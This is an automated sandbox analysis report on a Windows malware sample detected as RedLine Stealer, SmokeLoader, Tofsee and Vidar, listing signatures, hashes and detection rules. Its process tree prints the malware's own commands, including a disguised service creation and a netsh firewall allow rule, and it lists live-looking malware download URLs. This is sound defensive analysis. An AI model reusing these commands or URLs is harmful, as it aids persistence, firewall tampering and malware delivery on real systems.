Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report GNXG5XLBEH.exe

Overview

General Information

Sample Name:GNXG5XLBEH.exe
Analysis ID:553366
MD5:6f48e0e76c5dfb3fc3aa45311fa6d0ef
SHA1:981a29377351493ce6bce4d3aedeec9034dee056
SHA256:277ac2c203e37dcf3b71748e7de0610ba4bf87ddbb7a19cbe7e6be4cce5ed175
Tags:exeRedLineStealer
Infos:

Most interesting Screenshot:

Detection

RedLine SmokeLoader Tofsee Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Sigma detected: Suspect Svchost Activity
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected Vidar stealer
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected Tofsee
Sigma detected: Copying Sensitive Files with Credential Data
Maps a DLL or memory area into another process
Found evasive API chain (may stop execution after checking mutex)
Uses netsh to modify the Windows network and firewall settings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
Allocates memory in foreign processes
Performs DNS queries to domains with low reputation
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Suspicious Svchost Process
Found evasive API chain (may stop execution after checking locale)
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Drops executables to the windows directory (C:\Windows) and starts them
Checks if the current machine is a virtual machine (disk enumeration)
Writes to foreign memory regions
.NET source code references suspicious native API functions
Changes security center settings (notifications, updates, antivirus, firewall)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
PE file has nameless sections
Machine Learning detection for dropped file
Modifies the windows firewall
Contains functionality to detect sleep reduction / modifications
Found evasive API chain (may stop execution after checking computer name)
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
Downloads executable code via HTTP
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Modifies existing windows services
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Sigma detected: Netsh Port or Application Allowed
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
PE file contains sections with non-standard names
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Entry point lies outside standard sections
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Found evaded block containing many API calls
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • GNXG5XLBEH.exe (PID: 3224 cmdline: "C:\Users\user\Desktop\GNXG5XLBEH.exe" MD5: 6F48E0E76C5DFB3FC3AA45311FA6D0EF)
    • GNXG5XLBEH.exe (PID: 6268 cmdline: "C:\Users\user\Desktop\GNXG5XLBEH.exe" MD5: 6F48E0E76C5DFB3FC3AA45311FA6D0EF)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • 5BBC.exe (PID: 6604 cmdline: C:\Users\user\AppData\Local\Temp\5BBC.exe MD5: 277680BD3182EB0940BC356FF4712BEF)
          • WerFault.exe (PID: 3896 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6604 -s 520 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
        • 6B9B.exe (PID: 6156 cmdline: C:\Users\user\AppData\Local\Temp\6B9B.exe MD5: 039CCF44EF7B55AEB4D22D211D17774E)
          • 6B9B.exe (PID: 6568 cmdline: C:\Users\user\AppData\Local\Temp\6B9B.exe MD5: 039CCF44EF7B55AEB4D22D211D17774E)
        • 6BA5.exe (PID: 1412 cmdline: C:\Users\user\AppData\Local\Temp\6BA5.exe MD5: 7E58C9178CBD9D56DB805F034EC795CB)
        • BackgroundTransferHost.exe (PID: 240 cmdline: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1 MD5: 02BA81746B929ECC9DB6665589B68335)
        • 77CC.exe (PID: 5196 cmdline: C:\Users\user\AppData\Local\Temp\77CC.exe MD5: D8DF1D21042865E2220B0D688BAE6DC4)
          • cmd.exe (PID: 5716 cmdline: "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ceaplexz\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 6480 cmdline: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\evjgtzc.exe" C:\Windows\SysWOW64\ceaplexz\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 5984 cmdline: C:\Windows\System32\sc.exe" create ceaplexz binPath= "C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe /d\"C:\Users\user\AppData\Local\Temp\77CC.exe\"" type= own start= auto DisplayName= "wifi support MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 5992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 2076 cmdline: C:\Windows\System32\sc.exe" description ceaplexz "wifi internet conection MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 6116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 484 cmdline: "C:\Windows\System32\sc.exe" start ceaplexz MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 5188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • netsh.exe (PID: 4864 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
            • conhost.exe (PID: 5268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • 8058.exe (PID: 5500 cmdline: C:\Users\user\AppData\Local\Temp\8058.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
          • 8058.exe (PID: 5192 cmdline: C:\Users\user\AppData\Local\Temp\8058.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
  • svchost.exe (PID: 6632 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6912 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6952 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7024 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7088 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 7156 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 5604 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6424 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • ttfssdi (PID: 4512 cmdline: C:\Users\user\AppData\Roaming\ttfssdi MD5: 6F48E0E76C5DFB3FC3AA45311FA6D0EF)
    • ttfssdi (PID: 1284 cmdline: C:\Users\user\AppData\Roaming\ttfssdi MD5: 6F48E0E76C5DFB3FC3AA45311FA6D0EF)
  • svchost.exe (PID: 6600 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1064 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 6204 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6604 -ip 6604 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • evjgtzc.exe (PID: 4876 cmdline: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe /d"C:\Users\user\AppData\Local\Temp\77CC.exe" MD5: BBB91EAF2FB4CC1AA911FF4D555EC36D)
    • svchost.exe (PID: 4020 cmdline: svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\6E36.exeSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x3b87:$x1: https://cdn.discordapp.com/attachments/

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000002B.00000003.399149809.0000000000620000.00000004.00000001.sdmpJoeSecurity_TofseeYara detected TofseeJoe Security
    0000001A.00000002.375596550.0000000000680000.00000004.00000001.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      0000002B.00000002.401571286.0000000000400000.00000040.00020000.sdmpJoeSecurity_TofseeYara detected TofseeJoe Security
        0000002E.00000000.418486488.0000000000402000.00000040.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          0000001E.00000002.396801518.0000000002170000.00000040.00000001.sdmpJoeSecurity_TofseeYara detected TofseeJoe Security
            Click to see the 22 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            23.2.6B9B.exe.6415a0.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              45.2.svchost.exe.2ee0000.0.raw.unpackJoeSecurity_TofseeYara detected TofseeJoe Security
                26.0.6B9B.exe.400000.5.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                  30.3.77CC.exe.2190000.0.raw.unpackJoeSecurity_TofseeYara detected TofseeJoe Security
                    31.2.8058.exe.412f910.1.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      Click to see the 21 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspect Svchost ActivityShow sources
                      Source: Process startedAuthor: David Burkett: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe /d"C:\Users\user\AppData\Local\Temp\77CC.exe", ParentImage: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe, ParentProcessId: 4876, ProcessCommandLine: svchost.exe, ProcessId: 4020
                      Sigma detected: Copying Sensitive Files with Credential DataShow sources
                      Source: Process startedAuthor: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\evjgtzc.exe" C:\Windows\SysWOW64\ceaplexz\, CommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\evjgtzc.exe" C:\Windows\SysWOW64\ceaplexz\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\77CC.exe, ParentImage: C:\Users\user\AppData\Local\Temp\77CC.exe, ParentProcessId: 5196, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\evjgtzc.exe" C:\Windows\SysWOW64\ceaplexz\, ProcessId: 6480
                      Sigma detected: Suspicious Svchost ProcessShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe /d"C:\Users\user\AppData\Local\Temp\77CC.exe", ParentImage: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe, ParentProcessId: 4876, ProcessCommandLine: svchost.exe, ProcessId: 4020
                      Sigma detected: Netsh Port or Application AllowedShow sources
                      Source: Process startedAuthor: Markus Neis, Sander Wiebing: Data: Command: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine|base64offset|contains: ijY, Image: C:\Windows\SysWOW64\netsh.exe, NewProcessName: C:\Windows\SysWOW64\netsh.exe, OriginalFileName: C:\Windows\SysWOW64\netsh.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\77CC.exe, ParentImage: C:\Users\user\AppData\Local\Temp\77CC.exe, ParentProcessId: 5196, ProcessCommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, ProcessId: 4864
                      Sigma detected: New Service CreationShow sources
                      Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\System32\sc.exe" create ceaplexz binPath= "C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe /d\"C:\Users\user\AppData\Local\Temp\77CC.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine: C:\Windows\System32\sc.exe" create ceaplexz binPath= "C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe /d\"C:\Users\user\AppData\Local\Temp\77CC.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\77CC.exe, ParentImage: C:\Users\user\AppData\Local\Temp\77CC.exe, ParentProcessId: 5196, ProcessCommandLine: C:\Windows\System32\sc.exe" create ceaplexz binPath= "C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe /d\"C:\Users\user\AppData\Local\Temp\77CC.exe\"" type= own start= auto DisplayName= "wifi support, ProcessId: 5984

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: http://81.163.30.181/l2.exeAvira URL Cloud: Label: malware
                      Source: http://185.7.214.171:8080/6.phpURL Reputation: Label: malware
                      Source: http://data-host-coin-8.com/files/6961_1642089187_2359.exeAvira URL Cloud: Label: malware
                      Source: http://unicupload.top/install5.exeURL Reputation: Label: phishing
                      Source: http://privacy-tools-for-you-780.com/downloads/toolspab3.exeAvira URL Cloud: Label: malware
                      Source: http://data-host-coin-8.com/files/7729_1642101604_1835.exeAvira URL Cloud: Label: malware
                      Source: http://data-host-coin-8.com/files/9030_1641816409_7037.exeAvira URL Cloud: Label: malware
                      Source: http://81.163.30.181/l3.exeAvira URL Cloud: Label: malware
                      Antivirus detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeAvira: detection malicious, Label: HEUR/AGEN.1211353
                      Source: C:\Users\user\AppData\Local\Temp\evjgtzc.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                      Source: C:\Users\user\AppData\Local\Temp\4955.exeAvira: detection malicious, Label: HEUR/AGEN.1212012
                      Source: C:\Users\user\AppData\Local\Temp\13C.exeAvira: detection malicious, Label: HEUR/AGEN.1212012
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: GNXG5XLBEH.exeVirustotal: Detection: 35%Perma Link
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: http://data-host-coin-8.com/files/6961_1642089187_2359.exeVirustotal: Detection: 17%Perma Link
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\2205.exeMetadefender: Detection: 34%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\2205.exeReversingLabs: Detection: 76%
                      Source: C:\Users\user\AppData\Local\Temp\2D8F.exeReversingLabs: Detection: 50%
                      Source: C:\Users\user\AppData\Local\Temp\5BBC.exeMetadefender: Detection: 45%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\5BBC.exeReversingLabs: Detection: 76%
                      Machine Learning detection for sampleShow sources
                      Source: GNXG5XLBEH.exeJoe Sandbox ML: detected
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\ttfssdiJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\74DE.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\2205.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\5BBC.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\evjgtzc.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\1523.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\6E36.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\D9EC.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\6471.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\54D0.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\2D8F.exeJoe Sandbox ML: detected
                      Source: 43.2.evjgtzc.exe.600e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 45.2.svchost.exe.2ee0000.0.unpackAvira: Label: BDS/Backdoor.Gen
                      Source: 30.3.77CC.exe.2190000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 30.2.77CC.exe.2170e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 43.3.evjgtzc.exe.620000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 28.2.6BA5.exe.7d0e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 43.2.evjgtzc.exe.660000.2.unpackAvira: Label: BDS/Backdoor.Gen
                      Source: 30.2.77CC.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
                      Source: 28.3.6BA5.exe.7f0000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 43.2.evjgtzc.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_00407470 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_00404830 memset,CryptStringToBinaryA,CryptStringToBinaryA,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_00407510 CryptUnprotectData,LocalAlloc,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_00407190 CryptUnprotectData,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_004077A0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,

                      Compliance:

                      barindex
                      Detected unpacking (overwrites its own PE header)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeUnpacked PE file: 28.2.6BA5.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeUnpacked PE file: 30.2.77CC.exe.400000.0.unpack
                      Source: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exeUnpacked PE file: 43.2.evjgtzc.exe.400000.0.unpack
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49948 version: TLS 1.0
                      Source: GNXG5XLBEH.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\AppData\Local\Temp\5BBC.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: unknownHTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.5:49787 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.5:49810 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.5:49876 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49878 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49893 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49914 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49923 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49928 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49932 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49936 version: TLS 1.2
                      Source: Binary string: profapi.pdb% source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdbA source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000001B.00000003.362609649.000000000549A000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.362887202.0000000003636000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.363451570.0000000003636000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.362674770.0000000003636000.00000004.00000001.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: powrprof.pdbK source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.362658267.0000000003630000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.364317064.0000000003630000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: C:\siwuxidugo_jezupih_cokon\keb5_bajayojagih vahu\cofugu.pdb source: GNXG5XLBEH.exe, GNXG5XLBEH.exe, 00000000.00000000.237874920.0000000000401000.00000020.00020000.sdmp, GNXG5XLBEH.exe, 00000000.00000002.243174357.0000000000401000.00000020.00020000.sdmp, GNXG5XLBEH.exe, 00000001.00000000.241196595.0000000000401000.00000020.00020000.sdmp, ttfssdi, 00000012.00000002.338879338.0000000000401000.00000020.00020000.sdmp, ttfssdi, 00000012.00000000.332813687.0000000000401000.00000020.00020000.sdmp, ttfssdi, 00000013.00000000.336956368.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: =C:\tuxifazim\miwoto.pdbh source: 6BA5.exe, 0000001C.00000000.361905903.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000001B.00000003.362658267.0000000003630000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.364317064.0000000003630000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 5BBC.exe, 00000015.00000000.344013914.0000000000413000.00000002.00020000.sdmp, 5BBC.exe, 00000015.00000002.412867900.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 0000001B.00000002.411689423.0000000003750000.00000002.00020000.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: /C:\siwuxidugo_jezupih_cokon\keb5_bajayojagih vahu\cofugu.pdbh source: GNXG5XLBEH.exe, 00000000.00000000.237874920.0000000000401000.00000020.00020000.sdmp, GNXG5XLBEH.exe, 00000000.00000002.243174357.0000000000401000.00000020.00020000.sdmp, GNXG5XLBEH.exe, 00000001.00000000.241196595.0000000000401000.00000020.00020000.sdmp, ttfssdi, 00000012.00000002.338879338.0000000000401000.00000020.00020000.sdmp, ttfssdi, 00000012.00000000.332813687.0000000000401000.00000020.00020000.sdmp, ttfssdi, 00000013.00000000.336956368.0000000000401000.00000020.00020000.sdmp
